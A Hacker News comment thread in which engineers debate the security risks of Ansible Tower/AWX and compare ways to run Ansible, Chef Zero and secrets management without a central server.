Hacker News new | comments | show | ask | jobs | submit login

If you're considering using this (or any similar) tool, please keep in mind that you're adding a lot of attack surface.

Your Ansible master is one of the most critical (if not the most critical) machine in your network. It has unrestricted access to everything, including a very detailed list of what and where everything is. If it's compromised, it's over.

Something like Ansible Tower adds a LOT of attack surface. Instead of a locked-down server exposing a public key-only SSH port, you suddenly have a whole web application stack in there. Your browser and every Chrome extension with full page access now has root access to your network (and don't get me started on potential CSRF or XSS vulnerabilities...).

If you don't need any of the enterprise-ey features, just might be better off with plain Ansible and Ara[1], with the latter running on a separate machine. A "sudoers" rule is much more secure than any ACL in a web application backend.

If you do want to use Tower, you need to think about these risks and how you mitigate them. Of course, this also applies to any similar tool like Jenkins, Rundeck, CircleCI or whatever if you give them production credentials.

[1]: https://ara.readthedocs.io/en/latest/

Hi! I'm the author of ARA and just wanted to thank you for mentioning it :)

Full disclosure: I'm a Software Engineer at Red Hat.

Tower has a lot of great features but I hate to concede that it does come with some of the drawbacks you mentioned. I think it comes down to weighing the pros and cons, making sure you are aware of the cons and putting measures in place to avoid problems.

It also heavily depends on your use case, Tower provides things like RBAC/ACL, auditing, scheduling, online editing and execution, an API, etc. If you happen to need none of that and you're perfectly happy with just using Ansible from your command line, there's probably little incentive for you to use it.

If all you need is reporting, ARA is simple, easy to install and setup, doesn't get in your way and just records things transparently.

I figured I might as well take the opportunity of posting to leave a video demo [1], even if a little outdated, as well as an example of live report that ara provides [2].

Let me know if you have any questions !

[1]: https://www.youtube.com/watch?v=k3i8VPCanGo [2]: http://logs.openstack.org/21/474721/7/check/gate-openstack-a...

This is a great point. Although...other CI systems already have that kind of privilege, right? e.g. Chef has a master node if I'm not mistaken.

In my experience, ansible playbooks are great when run from a more general purpose task runner like jenkins, which then has permissions to access/modify one's production environment. I don't think I would personally use tower unless it provides something much much better than running ansible tasks in Jenkins... it would be just too much of a hassle to get the security/compliance aspects right.

Chef Server has a central server. Chef Zero doesn't, especially when using tools like cfn-init/cfn-hup and S3-backed minimart to self-bootstrap. This is the approach I take, and it's the approach I see becoming more and more common. Letting nodes figure out how to deal with their own problems (better able to auto-scale, more fault tolerant) is, to me, much better than having Jenkins or whatever have to SSH into them in the first place.

You can do it with Ansible, if you're going home-roll it, but I haven't seen too many people do so.

Does anyone actually use Ansible server-less? Can it even be done?

(Edit: my bad, ignore this comment, I misphrased my question; the real question should have been: can you run Ansible locally on the target server, just like chef-solo/chef-zero?)

You can run Ansible locally with `-c local`.

But, as far as serverless/self-bootstrapping deploys go, it's less common. Ansible has less of a "culture of dependencies"; the simpler, more approachable-looking nature of the Ansible playbook format seems to lend itself to people one-offing whatever they need rather than looking for best-practices solutions that already exist. Because of this, there's no real Berkshelf equivalent for Ansible. The tooling doesn't exist, outside of Tower (sorta), because nobody wants it, and nobody wants it because the tooling doesn't exist. So the people who are doing with Ansible something similar to the Chef Zero stuff I mentioned above are mostly home-rolling it. (I just use a S3 bucket as a Minimart berkshelf endpoint and move on with my day.)

Last-mile configuration is also tricky. In my Chef Zero stuff, I use CloudFormation metadata to provide Chef attributes. You can do something similar with Ansible...but it's duct-tapey. There are times when simple is better; IMO, Ansible's core tooling errs too far on that side and the ecosystem has not caught up to make more rigorous approaches really viable.

Apologies if I'm wrong, but it sounds like you're not that familiar with Ansible's roles and the public Ansible Galaxy repo for them?


There are tons of roles available, for just about everything, and the quality isn't always great, but still higher on average than what I've found for most Chef recipes and Puppet modules.

And that's not to mention the very high number of high quality modules that are builtin to Ansible.

I am familiar with them, yeah. In practice, across a pretty wide spread of clients, I have never seen them used or written by anyone who isn't me. This is why I referred to it as a culture problem; the tooling problem is the lack of a Berkshelf equivalent.

I would strongly, strongly disagree as to the quality of most Ansible modules that I have dealt with, but it's probably more based on exactly what you need than anything else.

Ansible was designed to be server-less from the beginning. Are thinking of Chef or Puppet? Ansible Tower (which is the subject of this article) is a web application frontend for running Ansible.

On AWS, we bake our AMIs with packer and include the Ansible roles and playbooks.

We use CloudFormation to deploy, so in the instance metadata we have it run Ansible locally to bootstrap and return the exit status to cfn-signal.

We retrieve secrets via Parameter Store. For environment specific configs that are not secrets (ie passing in vars from CloudFormation), we have cloud-init write a json file that we include with our ansible-playbook command.

The command ends up looking something like:

ansible-playbook -v -i 'localhost,' -c local /some/path/playbook.yml --extra-vars '@/some/path/vars.json' && /opt/aws/bin/cfn-signal -e $? --stack ${AWS::StackName} --resource ${AsgName} --region ${AWS::Region}

Yes, my friend uses ansible to store his work-pc configuration. After upgrade/replacement he just installs git, ansible and his private key and then rest of the the setup is done by ansible from playbook in his private config repo.

In my mind, though, the biggest reason I used ansible was it's simple push-through-ssh nature. I knew that if there are some maintanance tasks I would have to do by sshing from my machine to some server, I could as well create and run an ansible playbook against it. This was espacially useful for configuring ephemeral boxes spawned on i.e. openstack where I know it will have ssh running and that is it.

we [1] do most of our AMI provisioning by booting a machine, checking out our ansible codebase and running `ansible-playbook -c local -i "localhost," ...` as part of cloud-init. Build progress is piped over SQS and a management process [2] waits for completion and triggers an AMI snapshot. It works well. I'm not sure if that's what you mean by "server-less", but in our use case there is no controller.

1. https://github.com/edx/configuration/ 2. https://github.com/edx/configuration/blob/master/util/vpc-to...

Hey Fred - I do believe we met when I was chatting with edX a little while back, funny seeing you around the internet. =) And yeah, this is much more of what I would describe as "serverless". It kind of sounds like what you're doing is pretty Packer-compatible; any particular reason you guys went the way you did?

For my purposes, Packer isn't always available, which is a bummer. The Chef Zero approach I described above is nice for my purposes because it works with either an AMI or a live instance; when I write cookbooks I break them into "bake" and "configure" recipes and sub-recipes, and the "bake" steps are effectively memoization of steps I also run (idempotently) when a machine comes up.

Yes, it can absolutely be done, but you'll need to build your own infrastructure. You just run the playbook locally using "-c local -i localhost,". Obviously, you'll have to figure out how to set variables and get the execution results back to the master.

It also means if any of your servers is compromised, the attacker will be in possession of your whole playbook.

> It also means if any of your servers is compromised, the attacker will be in possession of your whole playbook.

Which should, if you are designing your systems wisely, not matter at all, in any way, because configuration management systems should not contain secret or sensitive data (which should be provided from a more secure option--Credstash, Vault, whatever).

I could open-source all of my Chef cookbooks or Ansible playbooks and not have a security or correctness concern; this is pretty straightforward design.

Yes - you can either use your own tooling to distribute your playbooks to the hosts and then run ansible-playbook using the 'local' connection method, or you can use ansible-pull, which retrieves the playbooks from an scm (git) repo and runs them locally. You don't need AWX/Tower for any of this.

Yes, I reprovisioned our dying Jenkins machine like this, because we usually run ansible from Jenkins. I was tweaking and updating the playbooks on the new Jenkins machine then running ansible there, then adding things that worked back into git.

Ansible also works well over ssh too. It’s pretty flexible.

Ansible is serverless by design - all you need to control a remote system is SSH access and python installed on the target.

Calling that "serverless" is something of an abuse of the term. You can call it "push-based" rather than "pull-based" (a Chef/Puppet model), but there is definitely a "server" to be had--it's the machine running SSH and with the canonical datastore. It is--and this is one of many reasons I don't like Ansible very much--just a pretty poor server and often the developer's workstation.

"Serverless" would be more like what I described with regards to Chef Zero, where a machine, as it bootstraps, is able to fetch its playbooks from somewhere and self-execute with some sort of sourceable configuration data. The standard Ansible workflow is not only not "serverless", but it is antithetical to cloud-friendly scaling and fault-tolerance practices. (Think about how you're going to manage auto-scaling groups with it. It hurts.)

There is no need to have a server at all. Any configuration can be run locally without ssh.

Sure! If you read the thread, you will notice that I explicitly describe how to do that. And that this post is not referring to doing that--it's explicitly referring to not doing that, instead doing remote provisioning via SSH. And, as a bonus, I went into some of the contributing factors that lead to people not doing it. So I'm not super sure why you felt compelled to reply?

You were right in that your question was misphrased. Nobody seem to understand what you were asking.

Do you happen to know of any fuller description, maybe a blog post, of the Chef Zero + minimart (etc.) setup? (Or, really, any similar setup.)

I'm having a bit of a hard time 'getting' the handling of secrets, etc. in such a setup.

(We're currently using Ansible, and frankly it's turned into a huge pain -- even on just a few hosts it's incredibly slow and horrible to debug. I'd really like to eventually transition to a more "build-a-pristine base system image" + "self-by-applying-more-recent-playbooks" type approach.)

No, but I can probably write one. We just use Credstash (rcredstash) for secrets and are done with it. (One of the nice things about not-using-Ansible is the lowered bar to entry of just pulling a library and writing the code you need.)

PLEASE write a decently detailed blog post about this! I and several other people would be eternally grateful.

I find that this is one of the most frustrating things about the Brave New World of immutable/container/VM/cloud/etc. It's actually REALLY hard to separate the hype from actual working things because all you seem to find is the hype and... 50 page "tutorials" on how to set Kubernetes[1] up.

[1] Random example, but the mere fact that they use a "simplified" admin program (minikube) for the tutorial tells me volumes about how fun it's going to be and how little administration it's going to require in production. /s

I'll see what I can do. But--would an online course do? Because I have written one, I just haven't recorded the voiceovers yet...

The fun part is, I think most of the sexy tools are lousy. Ansible demos well but works poorly; Terraform has bitten me so many times I don't trust it; Kubernetes doesn't make sense to me in a universe where I am buying already-provisioned-and-segmented resource bunches (we can call them "virtual machines", maybe) where I have to incur extra deadweight loss because fault-tolerance implies requiring extra space in case any existing node goes away.

I have spent enough time thinking about this that I am reasonably confident in my approach, and I would like to share it. It's a little more than a blog, though.

Assuming you can motivate it decently, I think a course might be good... However, that's quite a different value proposition, so it might take a bit to convince my employees to do it -- whereas a 'I read this series of articles by this very knowledgeable guy' doesn't require much convincin'.

To quote the infinite wisdom of The Simpsons: "Do what you feel" [is right]. :)

ansible-pull gives a similar workflow to chef-zero in an autoscaling environment.

There's also a balance to be struck between pre-baking AMIs and running config management at instance launch time.

Sure. But that's pretty awful. ansible-pull relies on a git repository, which relies on key provisioning, which means that you need to configuration-manage your configuration management and you don't have a stump-dumb, easy solution for it in any major cloud. And you have no dependency management (submodules, at best, are not dependency management), so I hope that you've vendored (which is gross) all of your dependencies.

This really is what I do for a living. I'm speaking from a position of entirely too extensive experience when I say that Ansible has no good solution here in common use. If I thought Ansible was good enough for me to be spending a lot of time with (it's not, and I advocate that clients not use it if they have a choice), I'd have probably already had to write it.

As far as machine images go, they are an optimization, not a core system. Your configuration management systems need to be able to bootstrap from either an AMI, to lay on last-mile (configuration, as opposed to setup, stuff) and converge any updates since the last AMI build, or to start from scratch. And that is another weakness of Ansible; writing idempotent Ansible scripts is significantly harder than it needs to be.

Tower is great for presenting playbooks to other users less familiar with ansible, besides you have the same attack surface with Jenkins anyway.

And worse, in many places, due to most Jenkins instances (at least IMO) having dozens of plugins, many usually severely outdated.

Don't you have to give Jenkins the same credentials and attack surface that you would have had to give to AWX/Tower?

With the Jenkins model, can't someone just add a job that dumps the execution environment, and get all your credentials?

You are absolutely correct that these factors should be carefully considered prior to any deployment of AWX or Tower. You are granting Tower a lot of authority to your networks and systems, and should not do so without good reason. If you don't need the features of AWX/Tower, then the best practice is not to use it. There's a tremendous amount you can do with Ansible itself, without AWX/Tower, and lots of people use it happily that way.

That being said, I think you are overstating some of the risks. You don't need to grant every Tower user root access to everything on your network. If you're at a scale where Tower makes sense, you probably already have some sort of separation of privileges. I agree that a malicious Chrome extension could do a lot of damage - just like it could with all your other management tools like DRAC/ILO, network equipment GUIs and so forth. Yes, every web application carries the risk of CSRF/XSS or other vulnerabilities, and Tower is not immune to this, but we do spend a lot of time worrying about it, conducting audits, etc.

If your operation can succeed with nothing but a sudoers rule and command-line Ansible, then by all means use that. Nobody wants to force AWX/Tower on people who don't need it. But if you do need the feature set of Tower, I think it's one of the safer options available.

So, I've recently been evaluating AWX for my workplace. Thus, making sure it's secure is definitely important to me.

That said, I'm having a hard time seeing how a compromised browser access AWX could give anyone full access to everything. Attackers could effect anything a playbook has access to, but considering how varied playbooks are, it would be really hard to guess the right values to pass into a job to get what you want.

Can someone elaborate on how an attacker could do real damage using a browser based attack?

Simply add to any playbook a play with `all` hosts that drops your remote shell.

I had thought of the shell module. But the attacker would still have to know your playbook is using that module, and they'd have to know the variables you are passing into that module in order to override them.

So, can you explain how an attacker would figure that information out? Assuming the playbooks are stored in source control like the Tower docs recommend, and all your variable values are mostly in source control as well.

You would need source control access to do that.

Separate Chrome profile, no addons, proxied thru a dedicated VPN whose exit IP is the only one whitelisted by Tower or some reverse proxy in front of it. Or... just trust that of all the exploits someone could deliver to an addon, a specific attack on Tower will be pretty low on the list.

Yeah. What ^^ he said. Aside from how tightly locked down my localDev environment and development host are, I do hop into a sanitized Chrome profile (or just use an incognito window) when I'm doing things that require work through a GUI like the AWS console, Jenkins, GSuite Admin, etc...

Couple in a sound architectural model, and you're good. Unless you're working on some super duper top-secret stuff...but if we're talking about compliance and security at the CIS standards level, to the best of your ability and knowledge, you should be good. Keep in mind, of course, that large, blanket vulns show their faces every so often - like the KRACK vuln - which renders all of our preparation and paranoia mostly null.

Example (of a neurotically paranoid architecture): Dedicated VPN resides in a dedicated AWS account and fronts all traffic to all hosts in all of your organization accounts across AWS. The only services exposed publicly other than your VPN service are the public-facing services you run if you're hosting some SAAS, for example. Even then, your LB's better be public, and your EC2's behind them better be private. Yay port 443 and LB to instance certificate encryption.

Ansible Tower lives in some other "Internal Services" AWS account, and all traffic ingressed to hosts in that account is fronted by a bastion host and traffic proxy. The bastion/proxy is governed by a set of strict VPC route tables, and security groups that are set to only ever permit or accept traffic that corresponds to the IP addresses of your VPN.

If you wanna get even crazier than that, you can also strictly control egress rules for your security groups - so even if someone got in, they'd be hard pressed to get the data out of your systems without doing some acrobatics.

In general, if vulnerabilities @ the Tower server level are your concern, addressing that with architectural best-practices and network-level controls for locking up access and traffic to Tower is reasonable and gets the job done. It would be the same as securing anything else that's sensitive running in your infra, like Jenkins or RunDeck.

I think RedHat's done an excellent job, and a huge service to the community by finally making good on their promise of open sourcing Tower.

> It has unrestricted access to everything

It only has unrestricted access to what you give it unrestricted access to.

If your ansible playbooks use a user that doesn't have root access and limited sudo powers, then it's not much different from using Ara.

That's fair, but Ansible culture is to do everything as sudo, and traditionally it was pretty painful to execute only portions of a playbook as the sudo. Though it looks like that's gotten better in more recent times: http://docs.ansible.com/ansible/latest/become.html

Even if your playbooks run everything as sudo, that doesn't mean you have to grant AWX/Tower users the ability to create arbitrary playbooks or run anything else as sudo. You certainly can do that, but the point of the RBAC feature of Tower is that you don't have to.

The big improvement was the ability to turn sudo off/on for a particular task. Not sure when that was introduced. 1.9.something?

If you're using Ansible for configuration management, it'll need root access either way.

To do anything useful, you'd have to give it sudoer privs - this is true.

If you're squeamish about that, on principle, then Salt, Chef, and Puppet would be problematic as well. The only logical choice would be to provision and bake all of your images and push the AMI up to AWS...in which case Ansible would be an excellent utility anyway.

It doesn't need root access. It's just that most of the useful things to do on a server require root.

Maybe there should just be a trivial Electron wrapper around the Tower UI so that XSS/CSRF/extensions are not an issue.

Yeah, I've largely avoided using Tower for this reason, but you could theoretically get it up to an equivalent or at least comparable security level simply by SSH tunneling it or putting it behind a good VPN. Host compromise is still a risk even with ssh.

a tunnel does not protect against any of that. OP was already assuming it wasn't publicly accessible, or at least was ACLd to your company's public IPs.

> Instead of a locked-down server exposing a public key-only SSH port, you suddenly have a whole web application stack in there.

There's no webapp stack to attack if you're only able to access it via a tunnel. If you're assuming the machine you're tunneling it to is compromised, there are bigger issues at play - ones that would compromise even a plain ssh link.

I'm talking a direct tunnel from your ansible master to the host you're planning to use it on, not say, into your company's network at large.

If you're always using `become_user: root` in your playbooks, maybe think about writing them differently! I have experience with Tower, and have never configured users to have any level of access beyond very, very basic SSH access.

Sure, but from an ops perspective you won't really be able to do much sysadmining without root privileges.

My method is to have a "app superuser"; a user which is a group admin* for every group that I run apps as.

It can then do everything required with a few exceptions.

The exceptions are creating init/systemd files (associated startup/shutdown) and creating the necessary top-level directories for new apps.

Those can be allowed with a few careful sudo rules.

It can be a little convoluted but much more secure.

* "gpasswd -A <user>,,, <group>"

Note: to be a group admin doesn't necessarily mean you're in that group; it means that you can put yourself in and out of that group as required.

You can mitigate part of the risks if you use an SSH tunnel to access Tower via port 22.

Good points, though unlike some other similar apps, Ansible Tower has an selinux policy.

Given the context, there's not a big difference between a website getting owned and an admin's browser getting owned. When someone develops an exploit that breaks out of sandbox, they can do whatever they want.

Also, this assumes access to Tower is unlimited. ACLs applied in Tower should be able to limit what user has what access.

All it takes is a compromised browser extension. Happens all the time:


And a compromised node.js dependency could own a non-browser-controlled install. But you don't have to use node.js apps, and you don't need to use browser extensions.

Sure, but now you'll need to make sure noone in your company who has full access to Tower is using browser extensions.

It's absolutely possible to use Ansible Tower securely, it just takes some effort.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact